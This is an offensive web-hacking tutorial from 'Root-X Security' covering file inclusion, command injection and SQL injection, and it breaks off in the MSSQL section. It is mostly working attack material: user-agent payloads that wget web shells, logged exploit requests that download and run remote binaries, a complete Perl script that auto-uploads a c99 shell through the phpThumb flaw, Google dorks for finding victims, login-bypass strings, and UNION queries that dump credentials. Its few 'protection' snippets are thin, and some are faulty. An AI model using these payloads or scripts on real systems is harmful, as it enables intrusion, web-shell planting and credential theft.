Web-servers & Application Hacking

2014
Root
Root-X Security
1/1/2014
Web Servers & Application Hacking

Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.
Guide content :
 Remote file inclusion
 Local file inclusion
 LFI 2 RCE
 LFI 2 RCE Using Firefox
 Local file download
 Full path disclosure
 Command Injection Vulnerability Exploit
 SQL Injection - with load file
 MSSQL Injection
 Blind SQL Injection
 Postgre SQL Injection
 Error based Postgre SQL Injection
 SQL Injection on ASPX
 Dot net nuke
 XSS
 CRLF
 CSRF
 Server Side Includes | Server Side Inclusion
 Symlink Attack
 Sql injection String & Union based
 Xpath Injection
 LDAP Injection
 DNS Zone Transfer Vulnerability Exploit
 Oracle Padding Attack Using Brup Suite

So let’s get started !
Remote file inclusion :
1) RFI
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses
functions include () to include some files for a GET method. This file is usually in txt format
pages whose content is printed.
Example:
Code:
http://www.site.com/index .php?page=home

Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt
format.

2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>

3) Exploiting vulnerability
We have site:
Code:
http://www.site.com/index.php?page=home

Now instead of home we gonna use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell -link.com/shell.txt?

If site is vulnerable it should show shell with list of files from site you are attacking.

4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or
some other:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>

In that case we are going to use null byte bypass(%00).
Everything after %00 would not count and use. We are also using %00 for picture upload bypass
as php, but I am not going to talk about it.

So link should look like this:
Code:
http://www.site.com/index.php?page=www.shell -link.com/shell.txt?%00

5) Protection script
Script should look like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>

So we are going to add some stuff to protect it:
Code:
<?php
$page = $_GET['page'];
if(file_exists("pages/".$page) {
include($page);
}
?>

Local file inclusion :
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=

by adding
Code:
../../../../../../etc/passwd
(sometimes you have to add %00 on passwd).

2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=

3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00

When you enter this to link you get this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin /sh
mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mail ing List
Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug -Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian -
exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that site is vulnerable.

4) proc/self/environ

Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on
the site.

Instead of etc/passwd%00 we are going to put /proc/self/environ

If page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_ht ml GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x -xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac
HTTP_HOST=www.website.com HTTP_REFERER=ht tp://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PO RT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%
2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com SERVER_NAM E=www.website.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Serv..........

then proc/self/environ is enabled so we can upload the shell.

5) Shell uploading

To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/

Add-on Tamper Data:
Code:
https://addons.mozilla.org/en -US/firefox/addon/tamper -data/

Open site etc:
Code:
http://www.site.com/inde x.php?lien=../../../../../../../../../../../../proc/s
elf/environ

Tools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>

Click OK. To access shell use: Code:www.link.com/shell.php

LFI 2 RCE
 Find LFI vulnerabel site.

 Check its link.

 Do ->
http://www.site.com/index.php?lien=../../../../../../../../../../../../pro
c/self/environ

 Open command prompt and run script LFI2RCE.exe [C:\lfi2rce.exe "< Website vuln link>"]

 Type Command -: id
 Type Command -: uname -a
 Type Command -: ls -l

 Now Upload a "shell" in this web server so,
 Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip
 Type Command -: unzip c99.txt.zip
 Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming
"out14ws.php" is Public HTML page & move command will copy c99.txt Text to
"opt14ws.php")
 Type Command-: ls | grep Out14ws "OR " ls | grep c99
 Type Command -: pwd [ To check present working directory of shell ]
 Then open full link of your shell in yoyr web browse you get :
http://website-name/path/path/c99.php
http:// website-name/path/path/opt14ws.php.php

LFI 2 RCE Using Firefox
 Check the target if it is vulnerable to lfi or not
 Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00

 Now. See -:
http://www.site.com /index.php?page=../../../../../../proc/self/environ -: or
http://www.site.com /index.php?page=../../../../../../proc/self/environ %00

 Now in address bar or firefox type : " about:config "

 Find -: accessibility.browsewithcaret > rightclick > new > string

 NEW STRING VALUE : general.useragent.override
Press " Ok " new box will pop up ask for : ENTER STRING VALUE

 ENTER STRING VALUE : <?php phpinfo(); ?>
It is general.useragent.override

After it u will see something like :

 Now check the php version and Information while refreshing the vulnerable link or page.
Find disabled information -: disable_functions - system, passthru, shellexec, popen,
escapshellcmd, proc_open etc...

 Once u have checked the php info go to : " about:config " page and see for
"general.useragent.override " and ENTER STRING VALUE :
 <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print
"$output\n";}?></pre>
 Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd
/etc/passwd, pwd, etc...
 For uploading Shell You can type command : wget http://www.site.com/c99.php

Note : after putting command for getting its output you have to refresh the page or vulnable link.

 Command -: ls -la

 Output : On refreshing page

 Command : uname -a

Local file download :

1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET
method, but you can also use it with POST method using add-on Tamper Data.
Code:
http://site.com/download_file.php?file=notepad.exe

2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x -'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

3) Vulnerability check

To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe

We are gonna use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If it starts to download and if it open file in text editor it look something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now when we know that script is vulnerable, we want to see which files are on host. You can do
this on this way:
Code:
http://site.com/download_file.php?filel=../

../ is gonna back us one directory backward and download file.

1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.

In case 1.1 we dont have to guess file name and directory and we can download whatever we
want.
In case 1.2 we must guess file name and directory and we can download only files which name
we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website
Copier).

5) Protection script

We have script mentioned at start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x -'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}

Full path disclosure :

This method let you over errors in file or over errors made by programmers to let you see which
files are in which directories, over it you can't directly hack site, it just let you help while
hacking.

It is useful because it can help you in faster and easier hacking, also it can help you with Local
File Inclusion (LFI), when folder name is changed, or some other file. You can findout using
FPD.

There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.

1st is over array, by adding square brackets on link like this one:
Code:
index.php?page=home

To finish vulnerability attack is to add [] on destined place:
Code:
index.php?page[]=home.

That will give you error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory /home/insekure/public_html/index.php on line 211

From this you can see on site is it exists directory blah.

2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-
injection, by adding java code on site you will get error.

This is a javascript code:
Code:
javascript:void(document.cookie='PHPSESSID=');

add that in your address bar and hit enter, now when page is refreshed you will get this error:
Code:
Warning: session_start() [function.session -start]: The session id contains
illegal characters, valid characters are a -z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58

then try to open directory thems on site, that should list you files in that directory.

Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
Code:
error_reporting(0);

Command Injection Vulnerability Exploit

 phpThumb() "fltr[]" Command Injection Vulnerability Exploit Scans
 Automatic Shell upload
I. phpThumb() "fltr[]" Command Injection Vulnetability

since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]'
Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input
passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a
command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be
exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level
commands as there aren't any input validation checks for the $command data in phpthumb.functions.php.
00.function ImageMagickThumbnailToGD() {
01....
02.foreach ($this->fltr as $filterkey => $filtercommand) {
03.@list($command, $parameter) = explode('|', $filtercommand, 2);
04.switch ($command) {
05....
06.case 'blur':
07.if ($this->ImageMagickSwitchAvailable('blur')) {
08.@list($radius) = explode('|', $parameter);
09.$radius = ($radius ? $radius : 1);
10.$commandline .= ' -blur '.$radius;
11.unset($this->fltr[$filterkey]);
12.}
13.break;

14....
15.$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
16.$IMresult = phpthumb_functions::SafeExec($commandline);
17.clearstatcache();
18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
19.@unlink($IMtempSourceFilename);
20.}
21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
22.$this->FatalError('ImageMagick failed with message
('.trim($IMresult).')');
23.$this->DebugMessage('ImageMagick failed with message
('.trim($IMresult).')', __FILE__, __LINE__);
24....
25.}
The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit
escaping of command line parameters according to the changelog.

escapeshellarg
The updated code uses the php escapeshellarg function and also limits the length of the input.
0.case 'blur':
1.if ($this->ImageMagickSwitchAvailable('blur')) {
2.@list($radius) = explode('|', $parameter);
3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
4.$commandline .= ' -blur '.escapeshellarg($radius);
5.$successfullyProcessedFilters[] = $filterkey;
6.}
7.break;
The problem with these extensions is that they use dangerous PHP functions which have the potential to
mess up a web hosting server and hack / exploit user accounts further up to root level.

Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing
dangerous commands and take control over the complete server quickly.
C ertain functions which are used in such scripts are considered as dangerous and are turned off in the PHP
configuration by certain responsible webhosts.
(Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except
by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with
the following line:

disable_functions =
exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,
proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions

safe_mode = On
expose_php = Off
Enable_dl= Off
magic_quotes = On
register_globals = off
display errors = off
disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo,
escapeshellarg,escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1

Exploit Scans
The queries are as follows:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l
/tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -
aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755
/tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HT TP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f;
&phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in phpThum.php fltr[] parameter.

GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg;

Display all information about files / directories - shows long listing information about the file / directory.
ls -l /tmp;

Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6.
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;

Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so
that the file can be executed.
chmod 0755 /tmp/barbut6;

Run / Excute file barbut6.
/tmp/barbut6;

The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non -standard options aux, where "a" lists
all processes on a terminal, including those of other users, "x" lists all processes without controlling
terminals and "u" adds a column for the controlling user for each process. Note that, for maximum
compatibility when using this syntax, there is no "-" in front of the "aux".
ps -aux;

Send SIGKILL to all perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that
with SIGKILL the process will not have opportunity to clean up any system resources i t was using (e.g.
temporary files etc.).
killall -9 perl;

Start perl and run / execute file f.
perl /tmp/f;

The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9.
&phpThumbDebug=9

IP List

List of IP's involved in the scans
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 |
200.155.17.68

Targets
view source
print?
00.GET /cms/plugins/content/jthumbs/includes/phpThumb.php
01.GET /wp-content/plugins/ione -core/phpthumb/phpThumb.php
02.GET /common/scripts/phpThumb/phpThumb.php
03.GET /phpThumb/phpThumb.php
04.GET /libs/phpThumb/phpThumb.php
05.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
06.GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
07.GET /gallery/phpThumb/phpThumb.php

08.GET /wp-content/themes/victore/phpthumb/phpThumb.php
09.GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php
10.GET /wp-content/themes/redcarpe t/scripts/phpthumb/phpthumb.php
11.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
12.GET /wp-content/themes/comfy -plus/scripts/phpThumb/phpThumb.php
13.GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
14.GET
/mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/
phpThumb.php
15.GET
/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ph
pThumb.php
16.GET /modules/phpThumb/phpThumb.php
17.GET /lib/phpThumb/phpThumb.php
18.GET /manager/phpThumb/phpThumb.php
19.GET /thumb/phpThumb.php
20.GET /global/phpthumb/phpThumb.php
21.GET /components/com_hotornot2/phpthumb/phpThumb.php
22.GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php
23.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
24.GET /staticfiles/phpThumb/phpThumb.php
25.GET /content/phpthumb/phpthumb.php
26.GET /class/phpthumb/phpThumb.php
27.GET /admin/phpThumb/phpThumb.php
28.GET /phpThumb.php
29.GET /admin/upload/phpThumb.php
30.GET /assets/components/phpthumb/phpThumb.php
31.GET /components/com_alphacontent/assets/phpthumb/phpThumb.php
32.GET /components/com_hotornot2/phpthumb/phpThumb.php
33.GET /components/com_alphauserpoints/assets/ph pThumb/phpThumb.php

34.GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
35.GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
36.GET /wp-content/plugins/com -resize/phpthumb/phpThumb.php
37.GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php
38.GET /wp-content/themes/comfy -plus/scripts/phpThumb/phpThumb.php

II. Automatic Shell upload Perl Script
Note : Please change the c991.txt address to your own shell address.

#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date: 09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form -->
http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";

print "======================================================\n";
sleep(0.8);
print "Usage: perl phpthumb.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print "====================================================== \n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;
$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~
/Saving to: / ))
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}

else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}

print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... \n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";

$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute<\/b><\/a>
::<\/b><\/p><\/td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req-
>content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( \n";
exit(1);
}
}

else
{
print "[-] Txt shell not uploaded. :( \n";
}

MYSQL Injection :

1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am going to use:
Code:
http://site.com/Admin_Login.asp

2) Logging

Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

password' or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.

SQL Injection :

1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database.
Vulnerable sites are in format:
Code:
http://www.link.com/index.php?id=

You can put anything else instead of index.

2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.

1st way, we got link:
Code:
http://site.com/book.php?id=141

we are gonna add only ' at end of link so we get this link:
Code:
http://site.com/book.php?id=141'

2nd way, we got link:
Code:
http://site.com/book.php?id=141

we are going to add +and+1=2-- at end of link so we get:
Code:
http://site.com/book.php?id=141+and+1=2 --

If some part of page disappear (picture, text or something) or any error like (You have an error in
your SQL syntax) site is vulnerable.

4) Finding number of columns
We can do it by using function order by, on link:
Code:
[http://site.com/book.php?id=141

adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5 --

If page is opens normal there is more then 5 columns. Lets try with 10.
Code:
http://site.com/book.php?id=141+order+by+10 --

Now some part of site disappeared, which means that there's more then 5 and less then 10
columns. Lets try 7.
Code:
http://site.com/book.php?id=141+order+by+7 --

Page is opened normally which means that there is more then 7 and less then 10 columns. Lets
try 8.
Code:
http://site.com/book.php?id=141+order+by+7 --

on column 8 part of site disappear which means that there is 7 columns.

5) Finding vulnerable columns

Finding vulnerable columns is done with function union select all on link (in this case) we are
going to add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id= -141+union+select+all+1,2,3,4,5,6,7 --

It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be
taken from any column. We are going to take from second column.

6) Finding database version

As I said we are gonna take data from second column. Instead of number 2 we are going to put
version() or @@version
Code:
http://site.com/book.php?id= -141+union+select+all+1,@@version,3,4,5,6,7 --

on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5
we have to guess database version.

We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and
column.

7) Finding table names

If database version is 4 you wont be able to find name of table and column, you have to guess
their names. If database version is skip this step.
Names of some possible tables:
Code:

admin
admins
user
users
member
members

Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd

If database version is 5 we can take name of table by doing next step: instead of number 2 we
going to put group_concat(table_name) and after number of last column
+from+information_schema.tables+where+table_schema=database()--

So we get this link:
Code:
http://site.com/book.php?id= -
141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_sc
hem a.tables+where+tab le_schema=database() --

Instead of number 2 it showed name of table, in this case date, book, users. We gonna take
columns from users table.

8) Finding column name

We found table name that we want and now from that we want to take columns. Instead of
group_concat(table_name) we are going to put group_concat(column_name) and instead of
+from+information_schema.tables+where+table_schema=database()-- we are going to put
+from+information_schema.columns+where+table_name=hex-- instead of hex we have to
encrypt in hex name of table.

Go to:
Code:
http://www.string-functions.com/string -hex.aspx

write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now
can see the columns:
Code:
http://site.com/book.php?id= -
141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_s
che ma.columns+where+table_name=0x7573657273 --

9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a
stands for to make space between user and pw. Instead of
from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

and we have link:
Code:
http://site.com/book.php?id= -
141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+us
ers--

and result e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which is users and passwords from this site.

10) Filter bypassing

In case when you write union+select+all says "not accessible" then change it to
UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish
*/)
On some sites there is also restricted database version so you can use unhex(hex(version()))

11) Site protection from SQL Injection

Just put this code in your script:
Code:
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}

SQL Injection - Load File :

You found site with SQL vulnerability, now you can try to access table mysql.user and file
privileges.

To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable
column and at end of URL adding '+from+mysql.user--'.

It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.use
r--

If you get username, it means that you have access to mysql.user table and you can continue with
this tut.

Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)'
and of course '+from+mysql.user--'

Now when on page usernames and file priv. are listed you must find username which was written
at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y'
which is Yes. You have privileges.

Load File:

All we have to do is to write on vulnerable column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').

Which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw
d'),4--

If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file
name.

Hex e.g.
If we convert file name in Hex, before file name we will add '0x'
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632
f706173737764),4+from+m ysql.user--

Hex code '2f6574632f706173737764' works for '/etc/passwd'.

It is recommended for Hex:
Code:

www.string-functions.com/string -hex.aspx

If you decide to convert file in Char then add 'load_file(char(converted file to char))'

Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47 ,101
,116,99,47,112,97,115,1 15,119,100),4--

Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'

Char converter:
Code:
http://pookey.co.uk/binary.php

MSSQL Injection :

1) Finding number of columns

I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234

To find column number we gonna use order by function. We will add +order+by+5-- at end of
link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5 --

So we will get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.

/sr/page/member.asp, line 38

which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna
try with 3 and we get next error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.

/sr/page/member.asp, line 44

Which means that there is 3 columns.

2) Finding database version

To find database version we are using @@version.
Code:
http://www.site.com/sr/page/member.asp?id= -
234+union+select+all+1,@@version,3 --

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988 -2003 Microsoft Corporation Desktop Engine on

